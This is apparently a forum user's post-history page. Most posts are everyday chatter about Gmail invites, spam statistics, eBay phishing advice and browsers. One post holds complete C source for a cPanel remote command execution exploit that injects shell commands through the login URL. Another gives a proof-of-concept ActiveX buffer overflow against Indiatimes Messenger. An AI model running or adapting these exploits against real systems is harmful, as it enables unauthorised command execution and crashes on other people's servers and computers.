Jump to content
xisto Community

sunny

Members
  • Content Count

    94
  • Joined

  • Last visited

Everything posted by sunny

  1. Yes, It is true. The google also has an interface dedicated to those H4x0r people. Visit it at https://www.google.com/?hl=xx-hacker&gws_rd=ssl and see yourself. Thumbshot of the site:
  2. Another vulnerability in PHPbb based forums that can be used to easily gain any user level access to the forum. Even the admin account is not not secure with the default setup. Click Here for more details about -"How to be Admin on phpBB in Simple steps!" And here is the Homepage of PHPbb and click here to download the latest version.
  3. As with all other software and scripts, PHPbb also has a long history of vulnerabilities. But it is better than others because of quick developer community reponce towards new found security loopholes.PHPbb issues are fixed generally very less time then other systems. and that is why I like PHPbb.For the user, it is always a good practice to bookmark the PHPbb homepage to get the update news at time.
  4. I have found it on some security portal. It is interresting to know that our faithful cPanel has some vulnerabilities.One more thing. While I was experimenting with the code, I found out that the server is secure if it is using an updated version of cPanel. And in Xisto's case I am sure that we are secure :-)
  5. Some facts about Spaming: AT&T WorldNet says it rejects 10 million to 12 million e-mails a day because the addresses don't match real users'--a sure sign that spammers are at work. Newsweek - Crammed with Spam 1/2 to 3/4 of all spam email has forged reply addresses, estimating that the spam volume is now up to 1 billion messages a year. Jeff Lawhorn, Software Design Associates Most ISPs estimate the extra cost due to spam as $2 to $3 per month per user, and longer connection times, which can be costly for rural users who have to dial long distance to connect to the Internet. IDG A recent survey found that ISPs spend millions of dollars to stop spammers, with about $2 of each subscriber's bill going toward spam prevention. CNN Approximately 10% of ISP overhead deals with SPAM (churn rate; lost revenue due to defection; new customer acquisition; infrastructure; personnel) Gartner Group The Federal Trade Commission reports that when it went after spammers earlier this year, it received 500 unsolicited e-mails in a single mailbox every day - and the commission probably didn't receive it all. CNN The increases in marketing messages are outpacing the growth in personal e-mail. By 2005, expect to get about one marketing e-mail for every two or three personal messages. Industry Standard Spending on commercial e-mail will balloon to $7.3 billion in 2005 from $164 million in 1999. In 1999, the average consumer received 40 pieces of spam. By 2005, the total is likely to soar to 1,600. Jupiter Communications FTC gets 4,500 spam complaints per day The average business e-mail user receives three spam messages a day, and in three years that number will swell to 40. In 2003 we'll waste 15 hours deleting e-mail, compared to 2.2 hours in the year 2000. That will cost the average business in the future $400 per in-box, compared to $55 today. Ferris Research Average U.S. consumer will receive 1,600 commercial email messages in 2005, up from 40 in 1999, while non-marketing and personal correspondence will more than double from approximately 1,750 emails per year in 1999 to almost 4,000 in 2005. Jupiter Communications, May 2000 By 2002, E-mail will grow from 9.8% to 17.3% of a company's total number of contacts with a customer. Forrester Research One more thing, If you got an email from ebay and you suspect that it is not from actual eBay.com. then you can report this to ebay by forwarding that mail in original form to [b}spoof@ebay.com[/b] Your complaint will be registered and the person sending those email will be executed (hopefully). Anyways, by doing so you can help ebay to find more about those cheaters.
  6. Foxy is NOT firefox. not even near firefox. It is just an interface to the ie. I found Maxthon much better then other ie based explorers. URL: http://www.maxthon.com/ Notice from wassie: Please quote everything you copied past from an other website!
  7. Well, even if it is not is english, I can tell for sure that it is a cute news site :-) You are using a content management system (CMS). So what you want us to comment on; the CuteNews [ http://cutephp.com/ ] or the content you have posted on the site. If your answer is the 'content' then sorry my friend, I can't understand the content language. One more thiong thing, The site is still under consctruction. So, please complete it before sending in for a review. Any ways nice attempt.
  8. Currnetly there are several jokers out there who try to send fake emails pretending to be from eBay itself. Such emails may be used to steel personal as well as financial data is the user recieving the mail clicks on the links. After contacting the ebay Support via email I've got following tips: I am posting the mail I got from eBay as it is so that the users of Xisto can also detact an fake email and maintain their privacy. From: eBay Customer Support <spoof@ebay.com> To: Cyber Mitra < cyber . mitra @gmail.com> Hello,Thank you for writing to eBay regarding the email you received.Emails such as this, commonly referred to as "spoof" or "phished"messages, are sent in an attempt to collect sensitive personal orfinancial information from the recipients.The email you reported was not sent by eBay. We have reported this emailto the appropriate authorities.In the future, be very cautious of any email that asks you to submitinformation such as your credit card numbers or passwords. If you areever concerned about an email you receive from eBay, simply follow thesesteps:1. Open a new Web browser and type http://www.ebay.com/ into your browseraddress field to go directly to the eBay site.2. On eBay, click on the "My eBay" link at the top of the page and signinto your account.3. Check the "My Messages" link located on the left side of the My eBaypage. If an email affects your eBay account, it's now in "My Messages."Any email sent to your registered eBay email address from eBay or fromanother eBay member via eBay's member-to-member communication systemwill also appear in "My Messages."Just remember, if you get an email regarding a problem with your accountor that is requesting personal information, and the email looks like itis from eBay, please check My Messages first. If it's not there, it's afake email.If you still have any doubt about whether an email message is from eBay,please forward it to spoof@ebay.com immediately. Do not respond to it orclick any of the links. Do not remove the original subject line orchange the email in any way when you forward it to eBay.If you have already entered sensitive personal information, financialinformation, or your password into a Web site based on a request from aspoofed email, you should take immediate action to protect your identityand all of your online accounts. We have developed an eBay Help pagewith valuable information regarding the steps you should take to protectyourself. [url="http://forums.xisto.com/no_longer_exists/ review eBay's new tutorial about Spoof Emails, please see thefollowing Web page: [url="http://forums.xisto.com/no_longer_exists/ help you better protect yourself from fake eBay and PayPal Web sites,we have developed a feature for the eBay Toolbar called "Account Guard."Account Guard includes an indicator of when you are on an eBay or PayPalWeb site or a known spoof (or "phishing") site, buttons to report fakeeBay Web sites, and a password notification feature that warns you whenyou may be entering your eBay password on an unverified site.To learn more about the eBay Toolbar with Account Guard, please go to http://www.ebay.com/, click on "Downloads" at the bottom of the page, and thenclick on the "eBay Toolbar" link.We also recommend that you keep your browser, operating system, andvirus protection software up to date. Check for updates at the "WindowsUpdate" link on http://www.microsoft.com/de-de and scan your computer for virusesoften.Once again, thank you for alerting us to the spoof email you received.Your efforts help keep eBay a safe and fair place to trade.Regards,AndeeBay SafeHarborInvestigations Team______________________________eBayThe World's Online Marketplace! Ž*******************************************Important: eBay will not ask you for sensitive personal information(such as your password, credit card and bank account numbers, SocialSecurity numbers, etc.) in an email. Learn more account protection tipsat:[url="http://forums.xisto.com/no_longer_exists/ our latest announcements, please check:[url="http://forums.xisto.com/no_longer_exists/ order to better serve you, we'd like to occasionallyrequest feedback on our service. If you would rathernot participate, please click on the link below and sendus an email with the word "REMOVE" in the subject line.If that does not work, please send an email to theemail address below. Your request will be processedwithin 5 days.mailto:cssremove@ebay.com
  9. Explanation: Indiatimes Messenger is a communication client application just like Yahoo! messenger. the indiatimes messenger is used by site: http://www.indiatimes.com/ as usual. Indiatimes.com also has some issues with their web site. like in registration process. but that is a different story. Anyways, Indiatimes Messenger shows some problematic behaviour on certain conditions. Which may lead to buffer overfloaw and thus also result in Remote compromise.
  10. Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution vulnerability. /*cPanel <= 9x Remote Command Execution*///headers#include <stdio.h>//In/Out#include <winsock2.h>//sockets functions#include <stdlib.h>//memory functions#include <string.h>//strlen,strcat,strcpy#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"#define Port 2082 //port for connect to cPanel#define SIZE 1024 //buffer size to receive the data/*connect host:port*/SOCKET Conecta(char *Host, short puerto){ /*struct for make the socket*/ WSADATA wsaData; SOCKET Winsock;//listener socket /*two structures for connect*/ struct sockaddr_in Winsock_In; struct hostent *Ip; /*start the socket*/ WSAStartup(MAKEWORD(2,2), &wsaData); /*make*/ Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); //check socket status if(Winsock==INVALID_SOCKET) { /*exit*/ WSACleanup(); return -1; } /*complete the struct*/ Ip=gethostbyname(Host); Winsock_In.sin_port=htons(puerto); Winsock_In.sin_family=AF_INET; Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr))); /*connect*/ if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR) { /*end*/ WSACleanup(); return -1; } return Winsock;}/*MASTER FUNCTION*/int main(int argc, char *argv[]){ /*the socket*/ SOCKET sock; /*make the evil buffer to send the request*/ char evil_request[]="GET /login/?user=|%22%60"; char evil_request2[]="%60%22\r"; char *evil; /*to receive the data*/ char buf[SIZE]; printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex"); printf("\n"); printf("\n-----------------------------------------------------\n"); if(argc!=3)//cPanel_9x_rce.exe <host> <command> { printf("\n[+] Usage: %s <host> <command>\n",argv[0]); return 0; } printf("\n[+] Connecting %s:%d...",argv[1],Port); /*start the exploit*/ sock=Conecta(argv[1],Port);//connect if(sock==-1) { printf("Error\n"); return 1; } printf("OK"); /*make the EVIL request*/ evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char)); strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n"); //sends it send(sock,evil,strlen(evil),0); buf[recv(sock,buf,SIZE,0)]='\0'; //show the data printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf); WSACleanup(); LocalFree(buf); LocalFree(evil); return 0;}
  11. [CODE]Indiatimes Messenger 6.0 Buffer Overflow (Remote)Vulnerable Program : Indiatimes Messenger v6.0(Latest)Vendor URL : http://messenger.indiatimes.com/Exploit Type : Remote DoS (Remote Compromise may alsobe possible)Proof Of Concept:[script]var obj1 = newActiveXObject("MMClient.MunduMessenger.1");var buf = "";for(i=0; i<1000; i++){ buf += "A";}while(obj1.GetServerStatus() != "Logged In"); //waittill loginobj1.RenameGroup("Friends", buf, 5);[/script]The program (MMClient.exe) crashes @ 004B681B 8979 04 mov dword ptrds:[ecx+4],ediwith registers ecx, and edi = 0x41414141[controllable]So, remote compromise maybe possible (not confirmed).
  12. Carzy Frog, Just drives people crazy. The video is good and the music is O.K. I can't understant why it is getting so popular? For those who don't know what the 'Crazy Frog' thing is? Visit https://en.wikipedia.org/wiki/Crazy_Frog Yes Wikipedia has a topic dedicated to Crazy frog.
  13. Good stuff!Saint_Michael, from where you got all those?What about 30 credits per download?
  14. Buy some more cool stuff for my Computer - ($2000)Invest some money on fast case schemes (casino) - ($2500)Donate to the needy - ($2000)Thanks gift to the person giving me the money - ($500)A party with friends - ($2000)Give each one of you $50 bill for being my friend.
  15. I have Samsung RD220. It's a nice phone with basic features. I am planning to buy a new one with some cool features like >1m pixel camera.
  16. Here are few gmail invitations ready to use :-) Use them as soon as possible: https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-1c6e77fafa4f79e7de5106bad5f41d-63a59b66398ac4a50c3472afec4fa38cc0b6057b https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-19f60869f27ae8d4e21a87833e0a04-5788d58ad0442fcb6266831eb54dbb9755814f82 https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-217935baadbb68c9cd72b020eca648-e6d71121bd7fe013634ca038cd68dc5f1430683e https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-12b1ad28eb9a26ebc444962b51913d-4e86ee8955475df688eae406f98c3c84c85b84aa Please let everybody know when you use any one of the invitations posted here. Thanks, Sunny http://forums.xisto.com/no_longer_exists/ https://cybermitra.com/
  17. Well,All of you have your invitation sent. :-)Any one else need an invitation?
  18. If you haven't already heard about Gmail, it's a new search-based webmail service that offers: - 1,000 megabytes (one gigabyte) of free storage - Built-in Google search that instantly finds any message you want - Automatic arrangement of messages and related replies into "conversations" - Text ads and related pages that are relevant to the content of your messages _____________________________________________ Now just request and I'll send you one gmail invitation. Here is one for the early bird: https://accounts.google.com/SignUp?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-1d6ef094e53ccbda0df0d3edf4e6e2-5586271fdbe6d6c92cc4a67419817815307af525
×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.